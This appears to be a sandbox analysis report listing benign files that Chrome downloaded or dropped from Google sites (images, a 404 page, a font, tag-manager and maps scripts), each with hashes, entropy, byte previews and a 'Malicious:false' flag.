                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2402x1596, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):157178
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998930050760275
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:g2ci6ceYR3knxO8LV/vRvsfDWq/ScjeHxdO1XQOzwKmUXTnVO5eP1Ia/2pI0c:g2ctcPR3knxD/IWq/TibOFQORljnPP1v
                                                                                                                                                                                                                                                                                          MD5:CB6ED3B51519A2BCC3D7BC6DC208CADA
                                                                                                                                                                                                                                                                                          SHA1:4948E60261CA116C47C15DC4A695561C4CED043C
                                                                                                                                                                                                                                                                                          SHA-256:2714335D83198B49EFA35C792553D5075BBE51775543FEB06C5400865B5AB9F2
                                                                                                                                                                                                                                                                                          SHA-512:BE6D420EC4456EB1360E60380C7796899F89F5220E9A7E7E114BBB4154FBC6A03180546000042C9E05A0ED80499EC056637C9FBDC4A6237CE5DCDC7C15008546
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.e..WEBPVP8 .e...V...*b.<.>m6.H.#0*#2."...gn..rJ.~..[.s...w..../M....3.....K.^,.....7:..........*~...<.:\.r._.np.DE?.v..K.|9...?......Wo.......>......".....k.......^......`.......?.+.....?......r=)|..?....&=7........O.......9....<..m...?....i...-G.2...G.7~G......w..:..y.~..[.?.w...=&}..1..'t....t...6.W)l8.6........C.@.;s=....*C.....N....o...<.2.k,.e.t.HZl..d.....P.[...?...++...).4vo..o.\].Q....+.2Tp...Q]fDln.Y..O....f..,.3.U....v1g.A.E...\...S.aW).R}../T.N>..*.+.V.Q.Z..7Y........./..!.5-.&....++.....yR/.-..~2...|...G..#.......r..@J^..A.5.....{.^Cz....mz.N....D...<..w)`..vZ.Y.b...N..h....O...%Z}J.....#.`....)@.0..TD0._..k[.d...$.....].q....0W.Q3;Ht}..6.]..r,.w(=d...G%s..-..........4h.~.>.?&?}q....(j ..u.~3M ....B.....3@..'~.q.B.......!....u.0a!....3m..'s?J8vB.k..n..OAq..!5..g..o...,s....,...E.M..KH..&.R...o`Y.....>...K...+Z....A...Y`k..........."..W....}.F.s.....[Y.%....Pq.7..&..f.<..?....u.t.{&G.M*..pEJg..7./..Z.m'LC....*`.2...Y...........2.....Ru...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1565
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2675078899224985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8xKdS8f:3qD+2+pUAew85zsKQA
                                                                                                                                                                                                                                                                                          MD5:BC0AD2DB3272298238C3933EA0D944D1
                                                                                                                                                                                                                                                                                          SHA1:CCB1767CAF616C73513DC921CD3F5DA072582A77
                                                                                                                                                                                                                                                                                          SHA-256:0A6AD5109827EFF80F61F2106F29D9FB38CE486FA397551E506BF5B6ED861F36
                                                                                                                                                                                                                                                                                          SHA-512:064388FD474E86ECB2D17082C79F6C9232DB605F62979598D9EA525600B8F9786716B758220D7C3ECC116E8E84AF8BB6AB6297C4005BCEF26E69DD64F4D61A72
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://google.com/404/
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):314962
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9859735903528755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:BIFzP9uWvYtYOZl0q58b83xyuB0MbawZxr1SAIqTgXtD9z95fVR4rHo7:mzlNlOZB8qyQlbaar1PEdDRTfVYW
                                                                                                                                                                                                                                                                                          MD5:FE48F024C754220B710A16F58BEF7968
                                                                                                                                                                                                                                                                                          SHA1:CD19A340822BFB160653306DE9C5A650AD173962
                                                                                                                                                                                                                                                                                          SHA-256:A3BB294D6D53266AA00A1D5820CA8D09B55AF55A5A61C473CD7115C95085BDBE
                                                                                                                                                                                                                                                                                          SHA-512:C0E53286C007EA5EF6AB3E653FF0C03110B663FFE8009EF39433A8C3EFB2368BD7F08003F4C4AE3B8124F78B88220A5CC52C301D4E9F7DA023D091FEA76F59F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/JAHpZ2_EHeCUpdmIs4cbbahzG_fAB3drICQ6fzdVDU0bFa_Wx7Cae5JuN98SAvgfSOA4n8D2ODHsnRqwEoGqZw3KVilRloyOz8ydbrKXxSK6qdMmMUQ?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t....IDATx.d.Y.,Y.....cf>...7.{.b.s......1.Ud..&..@v.RS. ....W......[h.lu....".j..HV....)r........}6.s..[.f~_............{...>......^.f...f.....;.(.L...IE.s.D.c".dH..sJ>.".hDNU.g&..\. ..CL.f..@. ..I.T.I........ZJ...A....l...L..........!.C`...X.g.>)..\.m...!..]..<....wO..x...W.o.9..E..../.....Q.5K.fROmyn..6s....~<q..1.+.;44..^IN.D.!.".....HnADS..hlL.....b((.XV~....%.oS9.....3..C"2TP..0TU$....@....j.h.H.....b....`f.H...f......*v.................z'..L.}B.IsTQ..L.L. .T.....\]...0....\RVD.i....|6]...."........O?.)<...>..w.u...=...+7.~iwg....7_..w.G..?.........k..m..?z..o..b..^.../../.......w........_.r..j..k.?...w.._.....v....o.[.}4[.>.N..i.V..._...^......{..o.v...hY.....[........a.......'............./../...K....P..........U/V...............[..ff...j....X.3.+.2.....RJhH.`.AM.... `VP#.c$D.SB....cQ300%"QE0$.QD...PTG....0."23....:B .......$%a..............Q......;9C..g.LMJ..h..@.....h.......(...g.Ur.. @.0..`.n.....L.6.J.@
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (36753)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):36838
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3848433811665695
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:MvAvb2l+aoMimVpaUjiBG6Fkx3Fi+j/gyBiOhgclZU669soGS0tIbvj47r:NbIisjiBU1p636ZIvur
                                                                                                                                                                                                                                                                                          MD5:F6F33C2AA4443C188A68DBE6B56C4AC1
                                                                                                                                                                                                                                                                                          SHA1:C2209C4D3AC022A5039FFB80034BC35C35167046
                                                                                                                                                                                                                                                                                          SHA-256:235CC8D8A90B2B960EF8C6636AD5A67E9D7C7737B5C6642364BAB45E8B24CCF2
                                                                                                                                                                                                                                                                                          SHA-512:470C2E4D93B0DDE340593B67181AC3AFA5393C7E8F2A6B56892B93243C28B816A6364181356CAF8FAE16E25968C53D2B3A6F67E7C41D2408D5D9D81093170D09
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/js/third_party/markerclustererplus.min.js
                                                                                                                                                                                                                                                                                          Preview:var MarkerClusterer=function(){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e,t){return e(t={exports:{}},t.exports),t.exports}var n=function(e){return e&&e.Math==Math&&e},r=n("object"==typeof globalThis&&globalThis)||n("object"==typeof window&&window)||n("object"==typeof self&&self)||n("object"==typeof e&&e)||Function("return this")(),i=function(e){try{return!!e()}catch(e){return!0}},o=!i((function(){return 7!=Object.defineProperty({},1,{get:function(){return 7}})[1]})),s={}.propertyIsEnumerable,a=Object.getOwnPropertyDescriptor,u={f:a&&!s.call({1:2},1)?function(e){var t=a(this,e);return!!t&&t.enumerable}:s},l=function(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}},c={}.toString,h=function(e){return c.call(e).slice(8,-1)},f="".split,g=i((function(){return!Object("z").propertyIsEnumerable(0)}))?function(e){return"String"==h(e)?f.cal
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14341)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):284040
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.5640688460913035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:PyCax8eulzYeiTlG00ilXol0VQbQwM87NA0RsEemtJeN8ZzVn7L6IW8:PVphFKlq0Ud7bsEemve6375t
                                                                                                                                                                                                                                                                                          MD5:2C0F64DF604ADB9787E8D777C1558CCB
                                                                                                                                                                                                                                                                                          SHA1:133AAEC9E392D656334C0D1D28B104262CE0C73C
                                                                                                                                                                                                                                                                                          SHA-256:C072841368380E3AC2A21C8A496BD33614F01D2FFED68E4AC8C8DA199B701D11
                                                                                                                                                                                                                                                                                          SHA-512:DE88E19160197F0EDE2D134185A343386018820DCABE5DCF536F181843D7362EA20C6FB18409232251ABD05A969A1F4A1385B6154925BBEDF4BC01404B6CE4E6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-WXBX8JC
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"18",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"PROTOCOL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",1],":\/\/",["macro",2]]},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",5],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_ignoreCase":true,"vtp_defaultValue":"","vtp_map":["list",["map","key",".*(\u0026|\\?
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5420
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.953388250769666
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nPNH3wUHA+//9yA7q2EibHwCSCF0ekAGWswTGpQ/bqPKbXb0dpzNvzF:PNgUHFhe/+HwCSCFk7jpQ/bqPKbb0HNB
                                                                                                                                                                                                                                                                                          MD5:5D237029E7460C194234B9E7276211E9
                                                                                                                                                                                                                                                                                          SHA1:3C6CCEE3EA8C59B205394F65178FCC49662DCABF
                                                                                                                                                                                                                                                                                          SHA-256:0A225E621EEE22D88DD2D84B567EDF9622AE02FF55A459FE114DD3FE3E46FB5E
                                                                                                                                                                                                                                                                                          SHA-512:3A1061F8E7D19E68C2A64F1F1E9BDF0D58C9EC23BC9FDE8358BD4B9D5E8D3C975905AFFE1BA6F5B642BE239238A09516C617F44D989B237E594A19544ABCF36F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i3!3i5!4i256!2m3!1e0!2sm!3i707457593!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=17521
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8L..../..?.....$.....df...m$e..>..{|J..M*.....|...5...........u0Y.9.Bv...{..zw...].....i...!H...VV..kD.!J..U:.<"...Q.@...a.t4jj0t..h...G.'o....Xy..+..R..N5Js...@Y[...r.....0....cu...fFM=..).H.*8.*..5.W1.b...=.M..f/.lg.r.S....._.s6N.;.u0.n......>...uc...n.....Io1....1uC..M...8.....0...mJ_.{0=..J..<.n2f;p.h.Vl.N0.\0.J.8v.U.._wP..h.3.Ld....'.k.4r[h2....of3..M(+/IdFfU.b.C=e......&.....<J.....^[.5.X.:..A..;,...Fk..........'.....c.\...].7..3v..l.&..+..&..05..."3.zQ-.....p.8s~%..8.9GG.$w.]...3K6..W]....ne.7$/..Y#^..;.;.3P.3...rX...}...(6.H.0s...s.n'..6...4.....X..P.U.....Z...v.3.H.t.....r..9....3..J..O..P.c...B.MY.*.i(.G1.1...7#......:.\r...o.!..k]t.............3@<!....C.)+E...p'...wo..(..C.....QC...^'.+JU.G./.....3g.......2....0T..p.|)q.|..b...5.*..R......}...f.....m.fw.b.Z........J........yY...J..(......../P!._...`4........=B/t......l7./.G.......<..G ..^...1.6+.S...D,......}L.. .c..j.......U.w...p..U....D..r....G.............
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18536
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986571198050597
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                                                                                                                                                                                          MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                                                                                                                                                                          SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                                                                                                                                                                          SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                                                                                                                                                                          SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1704)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):145117
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4004658758204656
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:w3TXA9ysK+YG3iITH/ppIOOZqcY7wb/nECROuaHN0ynG7ABsN/lV:nI+YjH/EHHN0ynGcBsN9V
                                                                                                                                                                                                                                                                                          MD5:F3643349614823D0DD63B69015DA83F9
                                                                                                                                                                                                                                                                                          SHA1:7B993C27A0D58D16754CBAF11188DF9B81367A31
                                                                                                                                                                                                                                                                                          SHA-256:66DED354E50F21F997E806A14483F4CDB36E8B7AE054978B245848372A9FB56A
                                                                                                                                                                                                                                                                                          SHA-512:551391703D8BD84BFF2A0FDD071F3A182C7E5B39117AAD33034B0630F489B560021179274ACD869CA2D90FD62EE536B2471B43E4BA81169D19B0BE33D0FE68BC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){var m,aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){a!=Array.prototype&&a!=Object.prototype&&(a[b]=c.value)},ba="undefined"!=typeof window&&window===this?this:"undefined"!=typeof global&&null!=global?global:this;function ca(){ca=function(){};ba.Symbol||(ba.Symbol=da)}var da=function(){var a=0;return function(b){return"jscomp_symbol_"+(b||"")+a++}}();.function n(){ca();var a=ba.Symbol.iterator;a||(a=ba.Symbol.iterator=ba.Symbol("iterator"));"function"!=typeof Array.prototype[a]&&aa(Array.prototype,a,{configurable:!0,writable:!0,value:function(){return ea(this)}});n=function(){}}function ea(a){var b=0;return fa(function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}})}function fa(a){n();a={next:a};a[ba.Symbol.iterator]=function(){return this};return a}function p(a){n();var b=a[Symbol.iterator];return b?b.call(a):ea(a)}.function ha(a,b){if(b){var c=ba;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];e in c||(c[e]={});c=c[e]}a=
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5491
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952122786410624
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:ZTt2X7yBKsdU6AyKBrAQaAH6z38g5GgGi2MhC+K/JbKniaOjfkyYUMmMUTkx:ZTt2X7oU6AyK6b8OGQ5WJ9jfkyYUMmdW
                                                                                                                                                                                                                                                                                          MD5:2ED595CE7E64CAFE65E9FD2E3CE43CAF
                                                                                                                                                                                                                                                                                          SHA1:D9AC21F53EE1076D9A3A9339EF40685F443E7A37
                                                                                                                                                                                                                                                                                          SHA-256:275ACA5846C53DB033A8436D6E9A274912A2FFE64759B4411575759C468D6108
                                                                                                                                                                                                                                                                                          SHA-512:1C545BC730B4931CA7CDEA05070645C7A3BEBF56FACF5B0D0B3BD366FBEB9871CD9F3E6087D0419ACB080A477A150384821B5C39B6ADE48C1FFFA27F2252637C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....*IDATx..k.$.U..........Y.....;....(..H....B...!.Q..oH.+..P......J.D........8......d.~..><...{.P.3.].....cK....t.{.9uO.s.=....c.1..c.1..c.1..c.1..c.1..c..B%.X..WO(u..".....%.....K..".u...`I7.v[.[.W...j...|:.g.u.^..P.....Q.s..t](....S..<..D......\T..>....x{...].W.vg.^....^4U..yC.P...~...K..#ar......%.r.*T5...Hy..'~..............?.o..t^R....=`.;.N..6)MA$..a.N........U<...w../....?......i..B....l..TI.n......Or..............`...~.-.......G.c.-l.6lq.?.....7.0*X5....&D....MZ.......v.ko6.......N...o.... .\&.....3.__..-.[p..$4.J.u...J........NJc#..B........yFM.#.H...NE..`...j.t1=D...B<I.7.$.=.n.{/....n15...,...h..vR..7M..s]....'.Qk....../3....TK.h%........+.....v...wQQ.D{;S......tz.......y.O..mw...B=....Z..\)E...FH.Ia..G.S`.mN&.)<_.....@..}.j..*p3. .....=...bt.1........}.z.8#..F....V...<....:......|*.c.RgTp.1:..k....2[Fv...3...A....2.!}`.......a..:.S.=....G..u...NM.t..Fb....+....E...A.o8e...l...F.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (836)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18858
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.307097362372209
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:bCGXu+nlNIBRMzVKc5PsaxidME50xFP9MdYSi9tlKp:bCK7lwep7sCitKD+YDtlKp
                                                                                                                                                                                                                                                                                          MD5:28973A5C3151BE0D739C2648AA2109A0
                                                                                                                                                                                                                                                                                          SHA1:7D746E7FF84307D23507DB6D5DE40FB6E2C849D6
                                                                                                                                                                                                                                                                                          SHA-256:3B59D4F56AB2E8952CB1FE3642F54369E093291B666F71A376E004AE9BC69F96
                                                                                                                                                                                                                                                                                          SHA-512:FDE267564E707D2E49D7D618AA8D33A7390E2F0967B9A6402B053D9E81A1331E620711FF99744E35F71E72480883DD443EC95B0E192A846A1A71705B35B40749
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.js
                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';function p(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}}var q=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,c,b){if(a==Array.prototype||a==Object.prototype)return a;a[c]=b.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var c=0;c<a.length;++c){var b=a[c];if(b&&b.Math==Math)return b}throw Error("Cannot find global object");}var r=aa(this);function t(a,c){if(c)a:{var b=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in b))break a;b=b[f]}a=a[a.length-1];d=b[a];c=c(d);c!=d&&c!=null&&q(b,a,{configurable:!0,writable:!0,value:c})}}.t("Symbol",function(a){function c(h){if(this instanceof c)throw new TypeError("Symbol is not a constructor");return new b(d+(h||"")+"_"+f++,h)}function b(h,e){this.g=h;q(this,"description",{configurable:!0,writable:!0,value:e})}if(a)re
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):219
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2955739207570645
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:K6gjH7o4j35wK/RhgLRat+2YyRdP4zuFDLV6qmiUBw:fjI5wmhO+rYyRhXsnw
                                                                                                                                                                                                                                                                                          MD5:FE009C46DD1D23007374C2BE51B675A2
                                                                                                                                                                                                                                                                                          SHA1:8E25D24DD7D3ED9A15E8D62D3907AA5225FEAA13
                                                                                                                                                                                                                                                                                          SHA-256:4560AC801C2117E438FA30DF99383F06FF99AD60E0D7BDB0D8B5979A16B92E42
                                                                                                                                                                                                                                                                                          SHA-512:25016B672A5932CC3201EC3558F51609CF7BBD8164494D6302A751D4B823996AD92D673DDE80C10DCE7F48FFC1945C1ED78848B91B5A02616AAE57F06E36326A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{o as e}from"./0XPwTFcg.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */function n(o){return e({finisher:(r,t)=>{Object.assign(r.prototype[t],o)}})}export{n as e};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 255 x 255, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):62355
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.988970516897828
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:axn13EKQRvGGwCzxrt2cspAIw/y5APZRcWfrR0t7:ajEKAzBocQ3w/tRRdi
                                                                                                                                                                                                                                                                                          MD5:53E7443A0314D0C50017C0DA7009C6AA
                                                                                                                                                                                                                                                                                          SHA1:EDCE1BAA4A56C065BB244B195CBC850B6AD57DB9
                                                                                                                                                                                                                                                                                          SHA-256:1F062FC2DE503772111ECB903B23D934BC8001F7CC6C25E54C23BEACD55D4E23
                                                                                                                                                                                                                                                                                          SHA-512:BD3B1E914845B9D08BDC0D546FCEF8F691DB2C69AE0C6C3003E35CA902BEC1BCE477CAF6D5923DE414FD539107260B4E9905D688E5BCEEBF33BBC4F09E9C71C3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............>.......sBIT....|.d... .IDATx..i.e.U...}.}..T.U.U9.R.4.Jh....3....Q@..Z6.p..hC.d;.hc<.6 ..M......m...`..f.$.IHH*.T.T..r|....?.Z{.s.}./_fUeU.....=..=.y}{..nyA..~f.J.r...!.c....t..x@....+.^.k.:.....@....u...^H.%....x..9.<....}<.;.^O.w...<...\G......g>.Gex%..I".a.=H...].%A2....P@.........%'H.."......D. AH..B0...`...". .G.x$u..R>..n.. .....&l.l..2.MV.....x.H...>..I.....$T........HB.......16'.!A.....!......@Z})...Z?S.r.H..R ....H"..y:.~_..Q.......G.z>.t.,/...<..#..f.E..I._.. ......`.....Q...,....aM(....M8......F.~.h..R..$z.t.....9..*.....e..>.,M.n.F.e...S..r._F..|..}.,Hd.......m.M.o?9sN.>.O..D.=..A.."..H8@....S.R-....}.....N.=..$~I.~.[[.Or....>.e....A..z..........2 ..........pU...Q...n..#....0..(.Q.n.x....D.....&M0.G+..p..V...M?f.z....$R.iQ.....{..c.x.e.g..O.z#..J"_Gp..s...-._..1...?.hu..r..7....T...B....=k...\k...l5...&. l.V....b.....6._.gda..N.... ......_wG...^....7.l<..=..........n.\.!zc....GS.....o...........u..J5.R..
